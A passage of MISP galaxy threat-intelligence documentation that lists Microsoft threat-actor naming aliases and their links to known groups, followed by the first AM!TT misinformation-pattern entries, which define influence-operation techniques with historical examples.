  • EvilCorp

  • UNC2165

  • Indrik Spider

Manatee Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="INDRIK SPIDER" with estimative-language:likelihood-probability="likely"

Table 5117. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Mango Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Mango Sandstorm"

Mango Sandstorm is also known as:

  • MERCURY

  • MuddyWater

  • SeedWorm

  • Static Kitten

  • TEMP.Zagros

Mango Sandstorm has relationships with:

  • similar: misp-galaxy:threat-actor="MuddyWater" with estimative-language:likelihood-probability="likely"

Table 5118. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Marbled Dust

The tag is: misp-galaxy:microsoft-activity-group="Marbled Dust"

Marbled Dust is also known as:

  • SILICON

  • Sea Turtle

Marbled Dust has relationships with:

  • similar: misp-galaxy:threat-actor="Sea Turtle" with estimative-language:likelihood-probability="likely"

Table 5119. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Marigold Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Marigold Sandstorm"

Marigold Sandstorm is also known as:

  • DEV-0500

  • Moses Staff

Marigold Sandstorm has relationships with:

  • similar: misp-galaxy:threat-actor="MosesStaff" with estimative-language:likelihood-probability="likely"

Table 5120. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Midnight Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Midnight Blizzard"

Midnight Blizzard is also known as:

  • NOBELIUM

  • APT29

  • Cozy Bear

Midnight Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="APT29" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="UNC2452" with estimative-language:likelihood-probability="likely"

Table 5121. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Mint Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Mint Sandstorm"

Mint Sandstorm is also known as:

  • PHOSPHORUS

  • APT35

  • Charming Kitten

Mint Sandstorm has relationships with:

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT35" with estimative-language:likelihood-probability="likely"

Table 5122. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Mulberry Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Mulberry Typhoon"

Mulberry Typhoon is also known as:

  • MANGANESE

  • APT5

  • Keyhole Panda

  • TABCTENG

Mulberry Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="APT5" with estimative-language:likelihood-probability="likely"

Table 5123. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Mustard Tempest

The tag is: misp-galaxy:microsoft-activity-group="Mustard Tempest"

Mustard Tempest is also known as:

  • DEV-0206

  • Purple Vallhund

Table 5124. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Night Tsunami

The tag is: misp-galaxy:microsoft-activity-group="Night Tsunami"

Night Tsunami is also known as:

  • DEV-0336

  • NSO Group

Table 5125. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Nylon Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Nylon Typhoon"

Nylon Typhoon is also known as:

  • NICKEL

  • ke3chang

  • APT15

  • Vixen Panda

Nylon Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="APT15" with estimative-language:likelihood-probability="likely"

Table 5126. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Opal Sleet

The tag is: misp-galaxy:microsoft-activity-group="Opal Sleet"

Opal Sleet is also known as:

  • OSMIUM

  • Konni

Table 5127. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Peach Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Peach Sandstorm"

Peach Sandstorm is also known as:

  • HOLMIUM

  • APT33

  • Refined Kitten

Peach Sandstorm has relationships with:

  • similar: misp-galaxy:threat-actor="APT33" with estimative-language:likelihood-probability="likely"

Table 5128. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Pearl Sleet

The tag is: misp-galaxy:microsoft-activity-group="Pearl Sleet"

Pearl Sleet is also known as:

  • LAWRENCIUM

  • DEV-0215

Table 5129. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Periwinkle Tempest

The tag is: misp-galaxy:microsoft-activity-group="Periwinkle Tempest"

Periwinkle Tempest is also known as:

  • DEV-0193

  • Wizard Spider

  • UNC2053

Periwinkle Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="WIZARD SPIDER" with estimative-language:likelihood-probability="likely"

Table 5130. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Phlox Tempest

The tag is: misp-galaxy:microsoft-activity-group="Phlox Tempest"

Phlox Tempest is also known as:

  • DEV-0796

  • ClickPirate

  • Chrome Loader

  • Choziosi loader

Table 5131. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Pink Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Pink Sandstorm"

Pink Sandstorm is also known as:

  • AMERICIUM

  • Agrius

  • Deadwood

  • BlackShadow

  • SharpBoys

  • DEV-0227

Table 5132. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Pistachio Tempest

The tag is: misp-galaxy:microsoft-activity-group="Pistachio Tempest"

Pistachio Tempest is also known as:

  • DEV-0237

  • FIN12

Pistachio Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="WIZARD SPIDER" with estimative-language:likelihood-probability="likely"

Table 5133. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Plaid Rain

The tag is: misp-galaxy:microsoft-activity-group="Plaid Rain"

Plaid Rain is also known as:

  • POLONIUM

Plaid Rain has relationships with:

  • similar: misp-galaxy:threat-actor="POLONIUM" with estimative-language:likelihood-probability="likely"

Table 5134. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Pumpkin Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Pumpkin Sandstorm"

Pumpkin Sandstorm is also known as:

  • DEV-0146

  • ZeroCleare

Table 5135. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Raspberry Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Raspberry Typhoon"

Raspberry Typhoon is also known as:

  • RADIUM

  • APT30

  • LotusBlossom

Raspberry Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="APT30" with estimative-language:likelihood-probability="likely"

Table 5136. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Ruby Sleet

The tag is: misp-galaxy:microsoft-activity-group="Ruby Sleet"

Ruby Sleet is also known as:

  • CERIUM

Table 5137. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Sangria Tempest

The tag is: misp-galaxy:microsoft-activity-group="Sangria Tempest"

Sangria Tempest is also known as:

  • ELBRUS

  • Carbon Spider

  • FIN7

Sangria Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="FIN7" with estimative-language:likelihood-probability="likely"

Table 5138. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Sapphire Sleet

The tag is: misp-galaxy:microsoft-activity-group="Sapphire Sleet"

Sapphire Sleet is also known as:

  • COPERNICIUM

  • Genie Spider

  • BlueNoroff

Sapphire Sleet has relationships with:

  • similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"

Table 5139. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Seashell Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Seashell Blizzard"

Seashell Blizzard is also known as:

  • IRIDIUM

  • Sandworm

Seashell Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="Sandworm" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="IRIDIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="沙虫 - APT-C-13" with estimative-language:likelihood-probability="likely"

Table 5140. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Secret Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Secret Blizzard"

Secret Blizzard is also known as:

  • KRYPTON

  • Venomous Bear

  • Turla

  • Snake

Secret Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="Turla" with estimative-language:likelihood-probability="likely"

Table 5141. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Silk Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Silk Typhoon"

Silk Typhoon is also known as:

  • HAFNIUM

Silk Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="HAFNIUM" with estimative-language:likelihood-probability="likely"

Table 5142. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Smoke Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Smoke Sandstorm"

Smoke Sandstorm is also known as:

  • BOHRIUM

Table 5143. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Spandex Tempest

The tag is: misp-galaxy:microsoft-activity-group="Spandex Tempest"

Spandex Tempest is also known as:

  • CHIMBORAZO

  • TA505

Spandex Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="TA505" with estimative-language:likelihood-probability="likely"

Table 5144. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Star Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Star Blizzard"

Star Blizzard is also known as:

  • SEABORGIUM

  • Callisto

  • Reuse Team

Star Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="Callisto" with estimative-language:likelihood-probability="likely"

Table 5145. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Storm-0257

The tag is: misp-galaxy:microsoft-activity-group="Storm-0257"

Storm-0257 is also known as:

  • DEV-0257

  • UNC1151

Storm-0257 has relationships with:

  • similar: misp-galaxy:threat-actor="Ghostwriter" with estimative-language:likelihood-probability="likely"

Table 5146. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Storm-0530

The tag is: misp-galaxy:microsoft-activity-group="Storm-0530"

Storm-0530 is also known as:

  • DEV-0530

  • H0lyGh0st

Table 5147. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Strawberry Tempest

The tag is: misp-galaxy:microsoft-activity-group="Strawberry Tempest"

Strawberry Tempest is also known as:

  • DEV-0537

  • LAPSUS$

Strawberry Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="LAPSUS" with estimative-language:likelihood-probability="likely"

Table 5148. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Sunglow Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Sunglow Blizzard"

Sunglow Blizzard is also known as:

  • DEV-0665

Table 5149. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Tomato Tempest

The tag is: misp-galaxy:microsoft-activity-group="Tomato Tempest"

Tomato Tempest is also known as:

  • SPURR

  • Vatet

Table 5150. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Vanilla Tempest

The tag is: misp-galaxy:microsoft-activity-group="Vanilla Tempest"

Vanilla Tempest is also known as:

  • DEV-0832

Table 5151. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Velvet Tempest

The tag is: misp-galaxy:microsoft-activity-group="Velvet Tempest"

Velvet Tempest is also known as:

  • DEV-0504

Table 5152. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Violet Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Violet Typhoon"

Violet Typhoon is also known as:

  • ZIRCONIUM

  • APT31

Violet Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="APT31" with estimative-language:likelihood-probability="likely"

Table 5153. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Wine Tempest

The tag is: misp-galaxy:microsoft-activity-group="Wine Tempest"

Wine Tempest is also known as:

  • PARINACOTA

  • Wadhrama

Wine Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="PARINACOTA" with estimative-language:likelihood-probability="likely"

Table 5154. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Wisteria Tsunami

The tag is: misp-galaxy:microsoft-activity-group="Wisteria Tsunami"

Wisteria Tsunami is also known as:

  • DEV-0605

  • CyberRoot

Table 5155. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Zigzag Hail

The tag is: misp-galaxy:microsoft-activity-group="Zigzag Hail"

Zigzag Hail is also known as:

  • DUBNIUM

  • Dark Hotel

  • Tapaoux

Zigzag Hail has relationships with:

  • similar: misp-galaxy:360net-threat-actor="Darkhotel - APT-C-06" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="DarkHotel" with estimative-language:likelihood-probability="likely"

Table 5156. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Misinformation Pattern

AM!TT Technique.

Misinformation Pattern is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

misinfosecproject

5Ds (dismiss, distort, distract, dismay, divide)

Nimmo’s "4Ds of propaganda": dismiss, distort, distract, dismay (MisinfosecWG added divide in 2019). Misinformation promotes an agenda by advancing narratives supportive of that agenda. This is most effective when the advanced narrative pre-dates the revelation of the specific misinformation content. But this is often not possible.

The tag is: misp-galaxy:amitt-misinformation-pattern="5Ds (dismiss, distort, distract, dismay, divide)"

Table 5157. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0001.md

Facilitate State Propaganda

Organize citizens around pro-state messaging. Paid or volunteer groups coordinated to push state propaganda (examples include 2016 Diba Facebook Expedition, coordinated to overcome China’s Great Firewall to flood the Facebook pages of Taiwanese politicians and news agencies with a pro-PRC message).

The tag is: misp-galaxy:amitt-misinformation-pattern="Facilitate State Propaganda"

Table 5158. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0002.md

Leverage Existing Narratives

Use or adapt existing narrative themes, where narratives are the baseline stories of a target audience. Narratives form the bedrock of our worldviews. New information is understood through a process firmly grounded in this bedrock. If new information is not consitent with the prevailing narratives of an audience, it will be ignored. Effective campaigns will frame their misinformation in the context of these narratives. Highly effective campaigns will make extensive use of audience-appropriate archetypes and meta-narratives throughout their content creation and amplifiction practices. Examples include midwesterners are generous, Russia is under attack from outside.

The tag is: misp-galaxy:amitt-misinformation-pattern="Leverage Existing Narratives"

Table 5159. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0003.md

Competing Narratives

Advance competing narratives connected to same issue ie: on one hand deny incident while at same time expresses dismiss. MH17 (example) "Russian Foreign Ministry again claimed that “absolutely groundless accusations are put forward against the Russian side, which are aimed at discrediting Russia in the eyes of the international community" (deny); "The Dutch MH17 investigation is biased, anti-Russian and factually inaccurate" (dismiss).

Suppressing or discouraging narratives already spreading requires an alternative. The most simple set of narrative techniques in response would be the construction and promotion of contradictory alternatives centered on denial, deflection, dismissal, counter-charges, excessive standards of proof, bias in prohibition or enforcement, and so on.

These competing narratives allow loyalists cover, but are less compelling to opponents and fence-sitters than campaigns built around existing narratives or highly explanatory master narratives. Competing narratives, as such, are especially useful in the "firehose of misinformation" approach.

The tag is: misp-galaxy:amitt-misinformation-pattern="Competing Narratives"

Table 5160. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0004.md

Center of Gravity Analysis

Recon/research to identify "the source of power that provides moral or physical strength, freedom of action, or will to act." Thus, the center of gravity is usually seen as the "source of strength". Includes demographic and network analysis of communities

The tag is: misp-galaxy:amitt-misinformation-pattern="Center of Gravity Analysis"

Table 5161. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0005.md

Create Master Narratives

The promotion of beneficial master narratives is perhaps the most effective method for achieving long-term strategic narrative dominance. From a "whole of society" perpective the promotion of the society’s core master narratives should occupy a central strategic role. From a misinformation campaign / cognitive security perpectve the tactics around master narratives center more precisely on the day-to-day promotion and reinforcement of this messaging. In other words, beneficial, high-coverage master narratives are a central strategic goal and their promotion consitutes an ongoing tactical struggle carried out at a whole-of-society level.

By way of example, major powers are promoting master narratives such as: * "Huawei is detetmined to build trustworthy networks" * "Russia is the victim of bullying by NATO powers" * "USA is guided by its founding principles of liberty and egalitarianism"

Tactically, their promotion covers a broad spectrum of activities both on- and offline.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create Master Narratives"

Table 5162. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0006.md

Create fake Social Media Profiles / Pages / Groups

Create key social engineering assets needed to amplify content, manipulate algorithms, fool public and/or specific incident/campaign targets.

Computational propaganda depends substantially on false perceptions of credibility and acceptance. By creating fake users and groups with a variety of interests and commitments, attackers can ensure that their messages both come from trusted sources and appear more widely adopted than they actually are.

Examples: Ukraine elections (2019) circumvent Facebook’s new safeguards by paying Ukrainian citizens to give a Russian agent access to their personal pages. EU Elections (2019) Avaaz reported more than 500 suspicious pages and groups to Facebook related to the three-month investigation of Facebook disinformation networks in Europe. Mueller report (2016) The IRA was able to reach up to 126 million Americans on Facebook via a mixture of fraudulent accounts, groups, and advertisements, the report says. Twitter accounts it created were portrayed as real American voices by major news outlets. It was even able to hold real-life rallies, mobilizing hundreds of people at a time in major cities like Philadelphia and Miami.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake Social Media Profiles / Pages / Groups"

Table 5163. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0007.md

Create fake or imposter news sites

Modern computational propaganda makes use of a cadre of imposter news sites spreading globally. These sites, sometimes motivated by concerns other than propaganda—​for instance, click-based revenue—​often have some superficial markers of authenticity, such as naming and site-design. But many can be quickly exposed with reference to their owenership, reporting history and adverstising details. A prominent case from the 2016 era was the Denver Guardian, which purported to be a local newspaper in Colorado and specialized in negative stories about Hillary Clinton.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake or imposter news sites"

Table 5164. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0008.md

Create fake experts

Stories planted or promoted in computational propaganda operations often make use of experts fabricated from whole cloth, sometimes specifically for the story itself. For example, in the Jade Helm conspiracy theory promoted by SVR in 2015, a pair of experts—​one of them naming himself a “Military Intelligence Analyst / Russian Regional CME” and the other a “Geopolitical Strategist, Journalist & Author”--pushed the story heavily on LinkedIn.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake experts"

Table 5165. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0009.md

Cultivate useful idiots

Cultivate propagandists for a cause, the goals of which are not fully comprehended, and who are used cynically by the leaders of the cause. Independent actors use social media and specialised web sites to strategically reinforce and spread messages compatible with their own. Their networks are infiltrated and used by state media disinformation organisations to amplify the state’s own disinformation strategies against target populations. Many are traffickers in conspiracy theories or hoaxes, unified by a suspicion of Western governments and mainstream media. Their narratives, which appeal to leftists hostile to globalism and military intervention and nationalists against immigration, are frequently infiltrated and shaped by state-controlled trolls and altered news items from agencies such as RT and Sputnik. Also know as "useful idiots" or "unwitting agents".

The tag is: misp-galaxy:amitt-misinformation-pattern="Cultivate useful idiots"

Table 5166. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0010.md

Hijack legitimate account

Hack or take over legimate accounts to distribute misinformation or damaging content. Examples include Syrian Electronic Army (2013) series of false tweets from a hijacked Associated Press Twitter account claiming that President Barack Obama had been injured in a series of explosions near the White House. The false report caused a temporary plunge of 143 points on the Dow Jones Industrial Average.

The tag is: misp-galaxy:amitt-misinformation-pattern="Hijack legitimate account"

Table 5167. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0011.md

Use concealment

Use anonymous social media profiles. Examples include page or group administrators, masked "whois" website directory data, no bylines connected to news article, no masthead connect to news websites.

Example is 2016 @TEN_GOP profile where the actual Tennessee Republican Party tried unsuccessfully for months to get Twitter to shut it down, and 2019 Endless Mayfly is an Iran-aligned network of inauthentic personas and social media accounts that spreads falsehoods and amplifies narratives critical of Saudi Arabia, the United States, and Israel.

The tag is: misp-galaxy:amitt-misinformation-pattern="Use concealment"

Table 5168. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0012.md

Create fake websites

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake websites"

Table 5169. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0013.md

Create funding campaigns

Generate revenue through online funding campaigns. e.g. Gather data, advance credible persona via Gofundme; Patreon; or via fake website connecting via PayPal or Stripe. (Example 2016) #VaccinateUS Gofundme campaigns to pay for Targetted facebook ads (Larry Cook, targetting Washington State mothers, $1,776 to boost posts over 9 months).

The tag is: misp-galaxy:amitt-misinformation-pattern="Create funding campaigns"

Table 5170. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0014.md

Create hashtag

Many incident-based campaigns will create a hashtag to promote their fabricated event (e.g. #ColumbianChemicals to promote a fake story about a chemical spill in Louisiana).

Creating a hashtag for an incident can have two important effects: 1. Create a perception of reality around an event. Certainly only "real" events would be discussed in a hashtag. After all, the event has a name! 2. Publicize the story more widely through trending lists and search behavior

Asset needed to direct/control/manage "conversation" connected to launching new incident/campaign with new hashtag for applicable social media sites ie: Twitter, LinkedIn)

The tag is: misp-galaxy:amitt-misinformation-pattern="Create hashtag"

Table 5171. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0015.md

Clickbait

Create attention grabbing headlines (outrage, doubt, humor) required to drive traffic & engagement. (example 2016) “Pope Francis shocks world, endorses Donald Trump for president.” (example 2016) "FBI director received millions from Clinton Foundation, his brother’s law firm does Clinton’s taxes”. This is a key asset

The tag is: misp-galaxy:amitt-misinformation-pattern="Clickbait"

Table 5172. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0016.md

Promote online funding

Drive traffic/engagement to funding campaign sites; helps provide measurable metrics to assess conversion rates

The tag is: misp-galaxy:amitt-misinformation-pattern="Promote online funding"

Table 5173. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0017.md

Paid targeted ads

Create or fund advertisements targeted at specific populations

The tag is: misp-galaxy:amitt-misinformation-pattern="Paid targeted ads"

Table 5174. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0018.md

Generate information pollution

Flood social channels; drive traffic/engagement to all assets; create aura/sense/perception of pervasiveness/consensus (for or against or both simultaneously) of an issue or topic. "Nothing is true, but everything is possible." Akin to astroturfing campaign.

The tag is: misp-galaxy:amitt-misinformation-pattern="Generate information pollution"

Table 5175. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0019.md

Trial content

Iteratively test incident performance (messages, content etc), e.g. A/B test headline/content enagagement metrics; website and/or funding campaign conversion rates

The tag is: misp-galaxy:amitt-misinformation-pattern="Trial content"

Table 5176. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0020.md

Memes

Memes are one of the most important single artefact types in all of computational propaganda. Memes in this framework denotes the narrow image-based definition. But that naming is no accident, as these items have most of the important properties of Dawkins' original conception as a self-replicating unit of culture. Memes pull together reference and commentary; image and narrative; emotion and message. Memes are a powerful tool and the heart of modern influence campaigns.

The tag is: misp-galaxy:amitt-misinformation-pattern="Memes"

Table 5177. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0021.md

Conspiracy narratives

"Conspiracy narratives appeal to the human desire for explanatory order, by invoking the participation of poweful (often sinister) actors in pursuit of their own political goals. These narratives are especially appealing when an audience is low-information, marginalized or otherwise inclined to reject the prevailing explanation. Conspiracy narratives are an important component of the ""firehose of falsehoods"" model.

Example: QAnon: conspiracy theory is an explanation of an event or situation that invokes a conspiracy by sinister and powerful actors, often political in motivation, when other explanations are more probable "

The tag is: misp-galaxy:amitt-misinformation-pattern="Conspiracy narratives"

Table 5178. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0022.md

Distort facts

Change, twist, or exaggerate existing facts to construct a narrative that differs from reality. Examples: images and ideas can be distorted by being placed in an improper content

The tag is: misp-galaxy:amitt-misinformation-pattern="Distort facts"

Table 5179. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0023.md

Create fake videos and images

Create fake videos and/or images by manipulating existing content or generating new content (e.g. deepfakes). Examples include Pelosi video (making her appear drunk) and photoshoped shark on flooded streets of Houston TX.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake videos and images"

Table 5180. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0024.md

Leak altered documents

Obtain documents (eg by theft or leak), then alter and release, possibly among factual documents/sources.

Example (2019) DFRLab report "Secondary Infektion” highlights incident with key asset being a forged “letter” created by the operation to provide ammunition for far-right forces in Europe ahead of the election.

The tag is: misp-galaxy:amitt-misinformation-pattern="Leak altered documents"

Table 5181. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0025.md

Create fake research

Create fake academic research. Example: fake social science research is often aimed at hot-button social issues such as gender, race and sexuality. Fake science research can target Climate Science debate or pseudoscience like anti-vaxx

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake research"

Table 5182. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0026.md

Adapt existing narratives

Adapting existing narratives to current operational goals is the tactical sweet-spot for an effective misinformation campaign. Leveraging existing narratives is not only more effective, it requires substantially less resourcing, as the promotion of new master narratives operates on a much larger scale, both time and scope. Fluid, dynamic & often interchangable key master narratives can be ("The morally corrupt West") adapted to divisive (LGBT proganda) or to distort (individuals working as CIA operatives). For Western audiences, different but equally powerful framings are available, such as "USA has a fraught history in race relations, espically in crimincal justice areas."

The tag is: misp-galaxy:amitt-misinformation-pattern="Adapt existing narratives"

Table 5183. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0027.md

Create competing narratives

"Misinformation promotes an agenda by advancing narratives supportive of that agenda. This is most effective when the advanced narrative pre-dates the revelation of the specific misinformation content. But this is often not possible.

Suppressing or discouraging narratives already spreading requires an alternative. The most simple set of narrative techniques in response would be the construction and promotion of contradictory alternatives centered on denial, deflection, dismissal, counter-charges, excessive standards of proof, bias in prohibition or enforcement, and so on.

These competing narratives allow loyalists cover, but are less compelling to opponents and fence-sitters than campaigns built around existing narratives or highly explanatory master narratives. Competing narratives, as such, are especially useful in the ""firehose of misinformation"" approach."

The tag is: misp-galaxy:amitt-misinformation-pattern="Create competing narratives"

Table 5184. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0028.md

Manipulate online polls

Create fake online polls, or manipulate existing online polls. Examples: flooding FCC with comments; creating fake engagement metrics of Twitter/Facebook polls to manipulate perception of given issue. Data gathering tactic to target those who engage, and potentially their networks of friends/followers as well

The tag is: misp-galaxy:amitt-misinformation-pattern="Manipulate online polls"

Table 5185. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0029.md

Backstop personas

Create other assets/dossier/cover/fake relationships and/or connections or documents, sites, bylines, attributions, to establish/augment/inflate crediblity/believability

The tag is: misp-galaxy:amitt-misinformation-pattern="Backstop personas"

Table 5186. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0030.md

YouTube

Use YouTube as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="YouTube"

Table 5187. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0031.md

Reddit

Use Reddit as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Reddit"

Table 5188. Table References

Links

